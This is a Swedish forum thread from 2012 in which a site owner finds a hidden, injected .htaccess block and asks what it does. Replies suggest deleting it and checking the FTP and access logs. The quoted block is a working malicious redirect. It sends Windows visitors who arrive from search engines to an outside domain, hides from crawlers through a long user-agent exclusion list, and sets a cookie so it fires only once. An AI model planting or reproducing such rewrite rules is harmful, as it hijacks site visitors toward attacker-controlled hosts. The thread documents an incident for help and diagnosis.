FAQ |
Kalender |
2012-02-15, 11:16 | #1 | ||
|
|||
Nykomling
|
Skulle uppdatera en av mina sajter igår. Hur jag en gjorde fick jag bara 404 när jag klickade på menylänken till den uppdaterade sidan. Provade då de andra menylänkarna, ingen fungerade!!
Det enda som fungerade var startsidan. Efter mycket funderande och trixande kollade jag .htaccess-filen. Den såg tom ut men jag scrollade och scrollade i Wordpad och till slut hittade jag följande innehåll: <IfModule prefork.c> RewriteEngine On RewriteCond %{REQUEST_METHOD} ^GET$ RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|googl e\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\ .|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamm a\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpi le\?).*$ [NC] RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|a pache|appie|AppleSyndication).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sN ews|BeOS|BigBlogZoo).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|B logsLive|BlogsSay|blogWatcher).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\ shiptop).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal |Everest\-Vulcan).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friend ster|Fuck\sYou|Google).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDu de|Honda\-Search|HP\-UX).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|i Phone|IRIX|Jakarta|JetBrains).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Lifere a|LinkChecker).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Medi apartners|Megite|MetaProducts).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchSer ver|NewsAlloy|NewsFire).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nut ch|ObjectSearch|Octora).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenInt elligenceData|oreilly).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder| Scooter|Seeker|Series\s60).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient |Socialmarks|Sphere\sScout).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS |Surfer|Syndic8).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird |Twiceler|urllib|Validator).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmas ter|WebPatrol|wget|Win\s9x).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Win dows\sCE|Windows\sNT\s4).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yac y|Yahoo).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC] RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz |.*tar|.*ico$ [NC] RewriteCond %{HTTP_COOKIE} !^.*qKz.*$ [NC] RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC] RewriteCond %{HTTPS} ^off$ RewriteRule ^(.*)$ http://%{REMOTE_PORT}.akitahusky.net/url?sa=t&source=web&cd=2&ved=0NmqR24Ob&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=25Mseq7I6a2zqI2OzlA4 +pa1oQ==&usg=-tRU-YYqonXU8xmxK-4XRY&sig2=ZH8iC3aXAy2g9YKGRoLFIG [R=302,L,CO=qKz:25:%{HTTP_HOST}:9835:/:0:HttpOnly] </IfModule> #34eab213c50f4a92c18ab4fcf1d9e500fd0a75ca9b014cdba ecaae77 Vad är detta och vad skall detta script göra för något? Hur har det gått till? Kan man skydda sig mot detta på något sätt? |
||
Svara med citat |
2012-02-15, 12:02 | #2 | ||
|
|||
Medlem
|
Det är inget skript. Det är en fil du använder för att konfigurera hur olika apache-moduler ska fungera, typ...
Nu vet jag inget om din applikation men du kan ju testa att ta bort filen (ta en kopia av filen innan utifall den kanske behövs) / vic |
||
Svara med citat |
2012-02-15, 13:18 | #3 | ||
|
|||
Mycket flitig postare
|
Citat:
Antagligen har filen laddats upp via FTP eller genom säkerhetshål i ett script. Kontrollera därför FTP-log och access-log för tidpunkten då .htaccess-filen ändrades. När du vet hur intrånget skedde vet du också hur du ska skydda dig i framtiden. |
||
Svara med citat |
2012-02-15, 13:24 | #4 | ||
|
|||
Nykomling
|
Det är ju inget jag har lagt dit. Original .htaccess-fil hade bl.a. en del 301 redirect. Tittar jag på den fil som ursprungligen fanns i rooten så stämmer inte ett dugg med den här.
Den här texten fanns överhuvudtaget inte med. Så jag undrar fortfarande vad som hänt? |
||
Svara med citat |
2012-02-15, 13:26 | #5 | ||
|
|||
Nykomling
|
Tack foks!
Skall se om jag kan lista ut hur det gått till. |
||
Svara med citat |
Svara |